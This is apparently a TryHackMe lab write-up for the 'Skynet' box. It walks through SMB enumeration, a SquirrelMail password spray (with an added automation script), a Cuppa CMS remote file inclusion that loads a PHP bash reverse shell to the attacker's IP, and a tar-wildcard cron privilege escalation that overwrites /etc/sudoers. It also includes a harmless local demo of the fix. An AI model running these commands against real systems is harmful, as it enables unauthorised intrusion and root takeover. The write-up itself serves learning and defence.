Skynet
An easy Linux box from TryHackMe: follow a string of leaked data to get creds, use a remote file inclusion in a hidden CMS for initial access, then abuse a tar wildcard in a cron job that runs as root to escalate.
Recon
The description says it is a Linux box, so start with the usual nmap scan (default scripts and version detection):
sudo nmap -sC -sV -oA nmap/skynet 10.10.204.86
The scan shows SSH on 22, a web server on 80, Dovecot POP3/IMAP on 110/143, and Samba on 139/445:
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 99:23:31:bb:b1:e9:43:b7:56:94:4c:b9:e8:21:46:c5 (RSA)
| 256 57:c0:75:02:71:2d:19:31:83:db:e4:fe:67:96:68:cf (ECDSA)
|_ 256 46:fa:4e:fc:10:a5:4f:57:57:d0:6d:54:f6:c3:4d:fe (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Skynet
110/tcp open pop3 Dovecot pop3d
|_pop3-capabilities: RESP-CODES AUTH-RESP-CODE UIDL PIPELINING SASL CAPA TOP
139/tcp open netbios-ssn Samba smbd 3.X - 4.X (workgroup: WORKGROUP)
143/tcp open imap Dovecot imapd
|_imap-capabilities: more have SASL-IR LOGIN-REFERRALS ENABLE listed capabilities ID Pre-login OK LOGINDISABLEDA0001 LITERAL+ IDLE IMAP4rev1 post-login
445/tcp open netbios-ssn Samba smbd 4.3.11-Ubuntu (workgroup: WORKGROUP)
Service Info: Host: SKYNET; OS: Linux; CPE: cpe:/o:linux:linux_kernel
Opening the IP in a browser shows a Skynet search page whose search box does nothing.
Next, brute-force directories and files with gobuster:
sudo gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -o skynet.dirs -u 10.10.204.86
This turns up an interesting directory, /squirrelmail. Browsing to it shows the login page of SquirrelMail, an old webmail application, and the page footer gives the version as 1.4.23.
There are a few public exploits for this version, but none seem usable without credentials. The most promising is a remote file inclusion, but it needs an authenticated session: trying to include /etc/passwd through it, for example, just returns an authentication error. Park it until there are creds.
Moving on to SMB, enumerating it with enum4linux turns up a user, milesdyson:
enum4linux 10.10.204.86
=============================
| Users on 10.10.204.86 |
=============================
index: 0x1 RID: 0x3e8 acb: 0x00000010 Account: milesdyson Name: Desc:
user:[milesdyson] rid:[0x3e8]
It also lists a share called anonymous that allows anonymous access:
[+] Attempting to map shares on 10.10.204.86
//10.10.204.86/print$ Mapping: DENIED, Listing: N/A
//10.10.204.86/anonymous Mapping: OK, Listing: OK
//10.10.204.86/milesdyson Mapping: DENIED, Listing: N/A
//10.10.204.86/IPC$ [E] Can't understand response:
NT_STATUS_OBJECT_NAME_NOT_FOUND listing \*
Connect to that share with smbclient (blank password for the null session) and download its contents:
smbclient \\\\10.10.204.86\\anonymous
Among the files are a few logs; log1.txt is the interesting one:
cat log1.txt
cyborg007haloterminator
terminator22596
terminator219
terminator20
terminator1989
terminator1988
terminator168
terminator16
terminator143
terminator13
terminator123!@#
terminator1056
terminator101
terminator10
terminator02
terminator00
roboterminator
pongterminator
manasturcaluterminator
exterminator95
exterminator200
dterminator
djxterminator
dexterminator
determinator
cyborg007haloterminator
avsterminator
alonsoterminator
Walterminator
79terminator6
1996terminator
This looks like a password list (every entry is a variation on "terminator"), so try each one against the SquirrelMail login with the username milesdyson.
The very first entry works. Creds so far:
milesdyson:cyborg007haloterminator
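The spray above was done by hand; the following shell script is an added example (not from the write-up) that automates it: it posts each password from the leaked list to the SquirrelMail login and stops at the first hit. It assumes the SquirrelMail 1.4.x form fields login_username and secretkey posted to src/redirect.php, and that a successful login answers with a redirect to webmail.php; both are assumptions about the application, so verify them against your instance before relying on the result. The BASE URL is the lab address from the write-up.

```shell
#!/bin/sh
# Added example: spray the leaked log1.txt passwords against SquirrelMail.
# Assumes 1.4.x form fields (login_username / secretkey -> src/redirect.php)
# and that success is a redirect to webmail.php.

BASE="${BASE:-http://10.10.204.86/squirrelmail}"

# Returns 0 if a captured set of response headers looks like a successful
# login (assumed: a Location header pointing at webmail.php).
login_succeeded() {
    printf '%s\n' "$1" | grep -qi '^location:.*webmail\.php'
}

# Post one username/password pair and print only the response headers.
try_login() {
    curl -s -m 10 -D - -o /dev/null \
        --data-urlencode "login_username=$1" \
        --data-urlencode "secretkey=$2" \
        "$BASE/src/redirect.php"
}

# spray USER WORDLIST: try each non-empty line, print USER:PASS on success.
spray() {
    user="$1"; wordlist="$2"
    while IFS= read -r pw || [ -n "$pw" ]; do
        [ -z "$pw" ] && continue
        if login_succeeded "$(try_login "$user" "$pw")"; then
            echo "$user:$pw"
            return 0
        fi
    done < "$wordlist"
    echo "no valid password found for $user" >&2
    return 1
}

# Usage: sh spray.sh run milesdyson log1.txt
if [ "${1:-}" = run ]; then spray "${2:-milesdyson}" "${3:-log1.txt}"; fi
```

Because every candidate is a variation on one word, a real engagement would also feed the list through a rule-based mutation (case, years, suffixes) before spraying, and would throttle the loop to stay under any lockout threshold.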
Reading the inbox, there is a password reset email containing a new password:
)s{A&2Z=F^n_E.B`
It is presumably for the milesdyson SMB share that was denied earlier, so try it there.
Logging in to that share with smbclient as milesdyson and this password works.
Inside the share, notes/important.txt mentions a beta CMS at a hidden path:
1. Add features to beta CMS /45kra24zxs28v3yd
2. Work on T-800 Model 101 blueprints
3. Spend more time with my wife
That path is just a static page, so run gobuster against it; it finds /administrator, which is a Cuppa CMS login page:
sudo gobuster dir -w /usr/share/seclists/Discovery/Web-Content/raft-medium-directories.txt -u 10.10.204.86/45kra24zxs28v3yd
Default and guessed logins fail, but searching Exploit-DB for "Cuppa" turns up a file inclusion vulnerability in alertConfigField.php (the urlConfig parameter) that needs no authentication and can be turned into PHP code execution.
Exploitation
It is a remote file inclusion: the urlConfig parameter is fed to a PHP include, so the server fetches a PHP file from an attacker-controlled URL and executes it. Host a PHP reverse shell and point the parameter at it.
The payload is just a PHP wrapper around a bash reverse shell:
<?php exec("/bin/bash -c 'bash -i >& /dev/tcp/10.6.107.137/9999 0>&1'");?>
Save it as rev.php, serve that directory with Python's built-in http.server module on port 8000 so the target can fetch it, start a listener on port 9999, and then request:
http://10.10.204.86/45kra24zxs28v3yd/administrator/alerts/alertConfigField.php?urlConfig=http://10.6.107.137:8000/rev.php
The listener catches a reverse shell as www-data.
Privilege Escalation
Looking around, user.txt is in milesdyson's home directory, and next to it is a backups directory containing backup.sh.
Checking /etc/crontab shows that root runs this script every minute:
# m h dom mon dow user command
*/1 * * * * root /home/milesdyson/backups/backup.sh
17 * * * * root cd / && run-parts --report /etc/cron.hourly
25 6 * * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.daily )
47 6 * * 7 root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.weekly )
52 6 1 * * root test -x /usr/sbin/anacron || ( cd / && run-parts --report /etc/cron.monthly )
#
The script itself is two lines:
#!/bin/bash
cd /var/www/html
tar cf /home/milesdyson/backups/backup.tgz *
Since tar is called without an absolute path, the first thing to check is PATH hijacking: none of the directories searched before tar's location in cron's PATH are writable, so that is out.
Instead, look at the wildcard. The script changes into /var/www/html, the web root that www-data can write to, and archives everything in it. The issue is not the cf flags themselves (create an archive, write it to the named file; note there is no z, so despite the .tgz name nothing is compressed) but the unquoted *: the shell expands it into one argument per file name before tar runs, and GNU tar accepts options anywhere on the command line, so a file whose name starts with -- is parsed as an option instead of being archived.
That allows command injection through file names in /var/www/html, using tar's checkpoint feature: --checkpoint=1 makes tar pause after every record it writes, and --checkpoint-action=exec=... runs a command at each pause, with the cwd still /var/www/html.
Following the well-known tar checkpoint technique, create three files (not directories) that make tar execute a script as root. Here the script grants www-data passwordless sudo, but it could just as well spawn a reverse shell or add a user; any script you choose runs as root.
Create the files inside /var/www/html:
echo 'echo "www-data ALL=(root) NOPASSWD: ALL" > /etc/sudoers' > privesc.sh
echo "/var/www/html" > "--checkpoint-action=exec=sh privesc.sh"
echo "/var/www/html" > --checkpoint=1
Within a minute cron runs backup.sh, tar hits its first checkpoint and executes privesc.sh as root, and www-data can then run
sudo su
And get root! One caveat: the single > in privesc.sh replaces /etc/sudoers entirely rather than appending to it (>> would keep the existing rules), which is fine on a lab box but not something to do on a real engagement.
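To see the mechanism without waiting on cron, here is an added shell script (not from the write-up) that reproduces the PATH check and the wildcard injection locally as an unprivileged user. It builds a stand-in web root with the same three file names, replays the cron line exactly as written, then replays it with -- inserted before the wildcard to show the fix, and reports whether the injected script ran. It assumes GNU tar (bsdtar and busybox tar lack --checkpoint-action); the injected.marker file, the constructed PATH value and the temp directory layout are placeholders chosen for the demonstration, and privesc.sh here only drops a marker instead of rewriting /etc/sudoers.

```shell
#!/bin/sh
# Added example: local reproduction of the backup.sh wildcard injection.
# Runs as a normal user in a temp dir; the injected script only creates a
# marker file. Requires GNU tar.

# PATH-hijack check: print PATH entries that are writable and searched
# before the directory where CMD is actually found. cron's default PATH is
# /usr/bin:/bin, so for tar on this box nothing is printed.
writable_path_dirs_before() {
    path="$1"; cmd="$2"
    old_ifs=$IFS; IFS=:
    for d in $path; do
        [ -x "$d/$cmd" ] && break        # reached the real binary, stop
        [ -w "$d" ] && echo "$d"         # a fake CMD dropped here would win
    done
    IFS=$old_ifs
}

# Stand-in for /var/www/html: real content plus the three injected files.
setup_webroot() {
    root="$1"
    mkdir -p "$root"
    echo "<html>Skynet</html>" > "$root/index.html"
    # The script tar will execute; the marker proves it ran.
    printf 'touch "%s/injected.marker"\n' "$root" > "$root/privesc.sh"
    # File names that the unquoted * turns into tar options.
    echo "" > "$root/--checkpoint-action=exec=sh privesc.sh"
    echo "" > "$root/--checkpoint=1"
}

# Replay backup.sh as written: cd in, then tar cf ARCHIVE *.
# Returns 0 if the injected script ran (the vulnerable case).
vulnerable_backup() {
    root="$1"; archive="$2"
    rm -f "$root/injected.marker"
    ( cd "$root" && tar cf "$archive" * ) >/dev/null 2>&1
    [ -f "$root/injected.marker" ]
}

# Same line with -- before the wildcard: everything after it is an operand,
# so the option-shaped names are archived, not parsed.
# Returns 0 if the injected script did NOT run (the fixed case).
hardened_backup() {
    root="$1"; archive="$2"
    rm -f "$root/injected.marker"
    ( cd "$root" && tar cf "$archive" -- * ) >/dev/null 2>&1
    ! [ -f "$root/injected.marker" ]
}

main() {
    work=$(mktemp -d)
    setup_webroot "$work/html"
    echo "writable PATH dirs before tar: $(writable_path_dirs_before /usr/bin:/bin tar)"
    if vulnerable_backup "$work/html" "$work/backup.tgz"; then
        echo "tar cf backup.tgz *    -> privesc.sh executed"
    fi
    if hardened_backup "$work/html" "$work/backup2.tgz"; then
        echo "tar cf backup.tgz -- * -> privesc.sh not executed"
    fi
    rm -rf "$work"
}

# Usage: sh wildcard_demo.sh run
if [ "${1:-}" = run ]; then main; fi
```

Using -- is the minimal fix for the script; archiving the directory itself (tar cf archive.tar /var/www/html) or not running a backup of a www-data-writable directory as root at all would be the more robust choices.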